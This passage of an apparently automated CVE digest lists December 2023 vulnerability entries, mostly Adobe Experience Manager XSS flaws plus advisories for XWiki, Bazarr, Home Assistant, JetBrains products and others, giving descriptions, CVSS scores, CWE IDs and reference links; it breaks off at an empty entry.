Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48598
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48599

First published on : 15-12-2023 11:15:42
Last modified on : 16-12-2023 01:16:56

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48599
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48600

First published on : 15-12-2023 11:15:42
Last modified on : 16-12-2023 01:17:04

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48600
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48601

First published on : 15-12-2023 11:15:42
Last modified on : 16-12-2023 01:17:11

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48601
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48602

First published on : 15-12-2023 11:15:43
Last modified on : 16-12-2023 01:17:20

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48602
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48603

First published on : 15-12-2023 11:15:43
Last modified on : 16-12-2023 01:17:31

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48603
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48604

First published on : 15-12-2023 11:15:43
Last modified on : 16-12-2023 01:17:39

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48604
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48605

First published on : 15-12-2023 11:15:43
Last modified on : 16-12-2023 01:17:47

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48605
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48606

First published on : 15-12-2023 11:15:43
Last modified on : 16-12-2023 01:17:55

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48606
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48607

First published on : 15-12-2023 11:15:44
Last modified on : 16-12-2023 01:18:09

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48607
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48609

First published on : 15-12-2023 11:15:44
Last modified on : 16-12-2023 01:21:24

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48609
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48610

First published on : 15-12-2023 11:15:44
Last modified on : 16-12-2023 01:21:35

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48610
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48611

First published on : 15-12-2023 11:15:44
Last modified on : 16-12-2023 01:21:50

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48611
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48612

First published on : 15-12-2023 11:15:45
Last modified on : 16-12-2023 01:21:59

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48612
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48613

First published on : 15-12-2023 11:15:45
Last modified on : 16-12-2023 01:22:06

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48613
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48614

First published on : 15-12-2023 11:15:45
Last modified on : 16-12-2023 01:22:14

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48614
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48615

First published on : 15-12-2023 11:15:45
Last modified on : 16-12-2023 01:22:22

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48615
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48616

First published on : 15-12-2023 11:15:45
Last modified on : 16-12-2023 01:22:35

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48616
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48617

First published on : 15-12-2023 11:15:46
Last modified on : 16-12-2023 01:22:42

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48617
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48618

First published on : 15-12-2023 11:15:46
Last modified on : 16-12-2023 01:22:51

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a Cross-site Scripting (DOM-based XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48618
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48619

First published on : 15-12-2023 11:15:46
Last modified on : 16-12-2023 01:22:59

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48619
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48620

First published on : 15-12-2023 11:15:46
Last modified on : 16-12-2023 01:23:12

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48620
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48621

First published on : 15-12-2023 11:15:46
Last modified on : 16-12-2023 01:23:21

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48621
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48622

First published on : 15-12-2023 11:15:47
Last modified on : 16-12-2023 01:23:29

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48622
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48623

First published on : 15-12-2023 11:15:47
Last modified on : 16-12-2023 01:23:47

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a reflected Cross-Site Scripting (XSS) vulnerability. If a low-privileged attacker is able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.

CVE ID : CVE-2023-48623
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48624

First published on : 15-12-2023 11:15:47
Last modified on : 16-12-2023 01:23:55

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field.

CVE ID : CVE-2023-48624
Source : psirt@adobe.com
CVSS Score : 5.4

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-79

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Vulnerability ID : CVE-2023-48441

First published on : 15-12-2023 11:15:10
Last modified on : 18-12-2023 18:47:25

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Access Control vulnerability. An attacker could leverage this vulnerability to achieve a low-confidentiality impact within the application. Exploitation of this issue does not require user interaction.

CVE ID : CVE-2023-48441
Source : psirt@adobe.com
CVSS Score : 5.3

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-284

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18.0
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Source : github.com

Vulnerability ID : CVE-2023-50728

First published on : 15-12-2023 22:15:07
Last modified on : 18-12-2023 14:05:33

Description :
octokit/webhooks is a GitHub webhook events toolset for Node.js. Starting in 9.26.0 and prior to 9.26.3, 10.9.2, 11.1.2, and 12.0.4, there is a problem caused by an issue with error handling in the @octokit/webhooks library because the error can be undefined in some cases. The resulting request was found to cause an uncaught exception that ends the Node.js process. The bug is fixed in octokit/webhooks.js 9.26.3, 10.9.2, 11.1.2, and 12.0.4, app.js 14.02, octokit.js 3.1.2, and Probot 12.3.3.

CVE ID : CVE-2023-50728
Source : security-advisories@github.com
CVSS Score : 5.4

References :
https://github.com/octokit/app.js/releases/tag/v14.0.2 | source : security-advisories@github.com
https://github.com/octokit/octokit.js/releases/tag/v3.1.2 | source : security-advisories@github.com
https://github.com/octokit/webhooks.js/releases/tag/v10.9.2 | source : security-advisories@github.com
https://github.com/octokit/webhooks.js/releases/tag/v11.1.2 | source : security-advisories@github.com
https://github.com/octokit/webhooks.js/releases/tag/v12.0.4 | source : security-advisories@github.com
https://github.com/octokit/webhooks.js/releases/tag/v9.26.3 | source : security-advisories@github.com
https://github.com/octokit/webhooks.js/security/advisories/GHSA-pwfr-8pq7-x9qv | source : security-advisories@github.com
https://github.com/probot/probot/releases/tag/v12.3.3 | source : security-advisories@github.com

Vulnerability : CWE-755


Vulnerability ID : CVE-2023-50720

First published on : 15-12-2023 19:15:09
Last modified on : 15-12-2023 20:09:58

Description :
XWiki Platform is a generic wiki platform. Prior to versions 14.10.15, 15.5.2, and 15.7-rc-1, the Solr-based search in XWiki discloses the email addresses of users even when obfuscation of email addresses is enabled. To demonstrate the vulnerability, search for `objcontent:email*` using XWiki's regular search interface. This has been fixed in XWiki 14.10.15, 15.5.2 and 15.7RC1 by not indexing email address properties when obfuscation is enabled. There are no known workarounds for this vulnerability.

CVE ID : CVE-2023-50720
Source : security-advisories@github.com
CVSS Score : 5.3

References :
https://github.com/xwiki/xwiki-platform/commit/3e5272f2ef0dff06a8f4db10afd1949b2f9e6eea | source : security-advisories@github.com
https://github.com/xwiki/xwiki-platform/security/advisories/GHSA-2grh-gr37-2283 | source : security-advisories@github.com
https://jira.xwiki.org/browse/XWIKI-20371 | source : security-advisories@github.com

Vulnerability : CWE-200


Vulnerability ID : CVE-2023-50266

First published on : 15-12-2023 21:15:09
Last modified on : 18-12-2023 14:05:33

Description :
Bazarr manages and downloads subtitles. In version 1.2.4, the proxy method in bazarr/bazarr/app/ui.py does not validate the user-controlled protocol and url variables and passes them to requests.get() without any sanitization, which leads to a blind server-side request forgery (SSRF). This issue allows for crafting GET requests to internal and external resources on behalf of the server. 1.3.1 contains a partial fix, which limits the vulnerability to HTTP/HTTPS protocols.

CVE ID : CVE-2023-50266
Source : security-advisories@github.com
CVSS Score : 5.3

References :
https://github.com/morpheus65535/bazarr/commit/17add7fbb3ae1919a40d505470d499d46df9ae6b | source : security-advisories@github.com
https://github.com/morpheus65535/bazarr/releases/tag/v1.3.1 | source : security-advisories@github.com
https://securitylab.github.com/advisories/GHSL-2023-192_GHSL-2023-194_bazarr/ | source : security-advisories@github.com

Vulnerability : CWE-918


Vulnerability ID : CVE-2023-50715

First published on : 15-12-2023 03:15:45
Last modified on : 15-12-2023 13:42:13

Description :
Home Assistant is open source home automation software. Prior to version 2023.12.3, the login page discloses all active user accounts to any unauthenticated browsing request originating on the Local Area Network. Version 2023.12.3 contains a patch for this issue. When starting the Home Assistant 2023.12 release, the login page returns all currently active user accounts to browsing requests from the Local Area Network. Tests showed that this occurs when the request is not authenticated and the request originated locally, meaning on the Home Assistant host local subnet or any other private subnet. The rationale behind this is to make the login more user-friendly and an experience better aligned with other applications that have multiple user-profiles. However, as a result, all accounts are displayed regardless of them having logged in or not and for any device that navigates to the server. This disclosure is mitigated by the fact that it only occurs for requests originating from a LAN address. But note that this applies to the local subnet where Home Assistant resides and to any private subnet that can reach it.

CVE ID : CVE-2023-50715
Source : security-advisories@github.com
CVSS Score : 4.3

References :
https://github.com/home-assistant/core/commit/dbfc5ea8f96bde6cd165892f5a6a6f9a65731c76 | source : security-advisories@github.com
https://github.com/home-assistant/core/security/advisories/GHSA-jqpc-rc7g-vf83 | source : security-advisories@github.com

Vulnerability : CWE-200


Source : mitre.org

Vulnerability ID : CVE-2021-42794

First published on : 16-12-2023 01:15:07
Last modified on : 18-12-2023 14:05:33

Description :
An issue was discovered in AVEVA Edge (formerly InduSoft Web Studio) versions R2020 and prior. The application allows a client to provide a malicious connection string that could allow an adversary to port scan the LAN, depending on the hosts' responses.

CVE ID : CVE-2021-42794
Source : cve@mitre.org
CVSS Score : 5.3

References :
https://www.aveva.com/en/products/edge/ | source : cve@mitre.org
https://www.cisa.gov/news-events/ics-advisories/icsa-22-326-01 | source : cve@mitre.org
https://www.exploit-db.com/docs/english/17254-connection-string-parameter-pollution-attacks.pdf | source : cve@mitre.org


Source : emc.com

Vulnerability ID : CVE-2023-28053

First published on : 18-12-2023 12:15:07
Last modified on : 18-12-2023 14:05:17

Description :
Dell NetWorker Virtual Edition versions 19.8 and below contain the use of deprecated cryptographic algorithms in the SSH component. A remote unauthenticated attacker could potentially exploit this vulnerability leading to some information disclosure.

CVE ID : CVE-2023-28053
Source : security_alert@emc.com
CVSS Score : 5.3

References :
https://www.dell.com/support/kbdoc/en-us/000220547/dsa-2023-358-security-update-for-dell-networker-virtual-edition-ssh-cryptographic-vulnerabilities | source : security_alert@emc.com

Vulnerability : CWE-327


Source : microsoft.com

Vulnerability ID : CVE-2023-36878

First published on : 15-12-2023 01:15:07
Last modified on : 15-12-2023 13:42:13

Description :
Microsoft Edge (Chromium-based) Security Feature Bypass Vulnerability

CVE ID : CVE-2023-36878
Source : secure@microsoft.com
CVSS Score : 4.3

References :
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36878 | source : secure@microsoft.com


Source : jetbrains.com

Vulnerability ID : CVE-2023-50870

First published on : 15-12-2023 14:15:15
Last modified on : 15-12-2023 15:26:42

Description :
In JetBrains TeamCity before 2023.11.1, a CSRF on login was possible.

CVE ID : CVE-2023-50870
Source : cve@jetbrains.com
CVSS Score : 4.3

References :
https://www.jetbrains.com/privacy-security/issues-fixed/ | source : cve@jetbrains.com

Vulnerability : CWE-352


Vulnerability ID : CVE-2023-50871

First published on : 15-12-2023 14:15:15
Last modified on : 15-12-2023 15:26:42

Description :
In JetBrains YouTrack before 2023.3.22268, the authorization check for inline comments inside thread replies was missed.

CVE ID : CVE-2023-50871
Source : cve@jetbrains.com
CVSS Score : 4.3

References :
https://www.jetbrains.com/privacy-security/issues-fixed/ | source : cve@jetbrains.com

Vulnerability : CWE-285


Source : netapp.com

Vulnerability ID : CVE-2023-27317

First published on : 15-12-2023 23:15:07
Last modified on : 18-12-2023 14:05:33

Description :
ONTAP 9 versions 9.12.1P8, 9.13.1P4, and 9.13.1P5 are susceptible to a vulnerability which will cause all SAS-attached FIPS 140-2 drives to become unlocked after a system reboot or power cycle or a single SAS-attached FIPS 140-2 drive to become unlocked after reinsertion. This could lead to disclosure of sensitive information to an attacker with physical access to the unlocked drives.

CVE ID : CVE-2023-27317
Source : security-alert@netapp.com
CVSS Score : 4.3

References :
https://security.netapp.com/advisory/NTAP-20231215-0001/ | source : security-alert@netapp.com

Vulnerability : CWE-200


(8) LOW VULNERABILITIES [0.1, 3.9]

Source : zabbix.com

Vulnerability ID : CVE-2023-32726

First published on : 18-12-2023 10:15:06
Last modified on : 18-12-2023 14:05:17

Description :
The vulnerability is caused by an improper check of whether RDLENGTH overflows the buffer in the response from the DNS server.

CVE ID : CVE-2023-32726
Source : security@zabbix.com
CVSS Score : 3.9

References :
https://support.zabbix.com/browse/ZBX-23855 | source : security@zabbix.com

Vulnerability : CWE-754


Source : adobe.com

Vulnerability ID : CVE-2023-48608

First published on : 15-12-2023 11:15:44
Last modified on : 16-12-2023 01:18:27

Description :
Adobe Experience Manager versions 6.5.18 and earlier are affected by an Improper Input Validation vulnerability. A low-privileged attacker could leverage this vulnerability to achieve a low-integrity impact within the application. Exploitation of this issue requires user interaction.

CVE ID : CVE-2023-48608
Source : psirt@adobe.com
CVSS Score : 3.5

References :
https://helpx.adobe.com/security/products/experience-manager/apsb23-72.html | source : psirt@adobe.com

Vulnerability : CWE-20

Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
Vulnerable version(s) : 6.5.18
Vulnerable product(s) : cpe:2.3:a:adobe:experience_manager:-:*:*:*:cloud_service:*:*:*


Source : hcl.com

Vulnerability ID : CVE-2023-28022

First published on : 15-12-2023 23:15:07
Last modified on : 18-12-2023 14:05:33

Description :
